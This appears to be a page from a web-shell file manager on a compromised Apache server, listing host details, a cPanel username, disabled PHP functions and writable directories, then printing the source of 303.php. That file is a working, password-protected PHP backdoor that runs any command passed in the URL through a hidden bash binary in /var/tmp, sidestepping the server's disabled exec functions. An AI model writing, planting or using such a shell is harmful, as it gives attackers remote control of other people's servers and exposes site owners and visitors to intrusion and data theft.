KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache
System : Linux 10-169-227-96.cprapid.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : kwssawblade ( 1099)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/kwssawblade/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/kwssawblade/public_html/303.php
<?php
$password = "cmd2026";
if (!isset($_GET['pass']) || $_GET['pass'] !== $password) {
    die("Access denied");
}
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    $descriptorspec = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );
    $process = proc_open("/var/tmp/.0k67uove/bash -c " . escapeshellarg($cmd), $descriptorspec, $pipes);
    if (is_resource($process)) {
        $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        echo "<pre>$output</pre>";
    } else {
        echo "ERROR: Cannot execute shell";
    }
} else {
    echo '<form method="get">
        <input type="hidden" name="pass" value="'.$password.'">
        <input type="text" name="cmd" placeholder="command">
        <input type="submit" value="Execute">
    </form>';
}
?>

Anon7 - 2021